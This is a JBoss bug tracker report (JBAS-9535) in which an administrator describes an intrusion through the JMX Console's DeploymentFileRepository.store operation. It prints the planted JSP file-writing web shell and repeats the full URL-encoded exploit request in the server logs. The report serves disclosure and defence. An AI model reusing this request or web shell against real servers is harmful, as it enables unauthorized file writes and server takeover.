Uploaded image for project: 'Application Server 3  4  5 and 6'
  1. Application Server 3 4 5 and 6
  2. JBAS-9535

Exploit found in JBoss JMX Console via HtmlAdaptor?action=invokeOpByName

    Details

    • Type: Bug
    • Status: Closed (View Workflow)
    • Priority: Major
    • Resolution: Cannot Reproduce
    • Affects Version/s: JBossAS-5.1.0.GA
    • Fix Version/s: None
    • Component/s: JMX
    • Labels:
      None

      Description

      I noticed a new deployment called myname.war with index.jsp which had the following inside:

      <%
      if(request.getParameter("f")!=null)
      (new java.io.FileOutputStream(application.getRealPath("
      ") + request.getParameter("f"))).write(request.getParameter("t").getBytes()
      );
      %>
      mynameok

      I looked into my web server logs and found the following entry:

      ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -

      I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but they've been unsuccessful so far.)

      Here is the complete log of the exploit as recorded by the webserver:

      access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
      access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /web-console/dtree.js HTTP/1.0" 302 - "http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
      access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET /jmx-console/jboss.css HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
      access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET /jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 - "http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
      access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET /invoker/JMXInvokerServlet HTTP/1.0" 200 3365 "http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
      access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 302 - "" ""
      access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
      access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST /invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-" "Java/1.6.0_10-rc2"
      access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
      ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" 401 -
      ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True HTTP/1.0" -

        Gliffy Diagrams

          Attachments

            Activity

              People

              • Assignee:
                Unassigned
                Reporter:
                mikelhansen Mike Hansen
              • Votes:
                0 Vote for this issue
                Watchers:
                3 Start watching this issue

                Dates

                • Created:
                  Updated:
                  Resolved: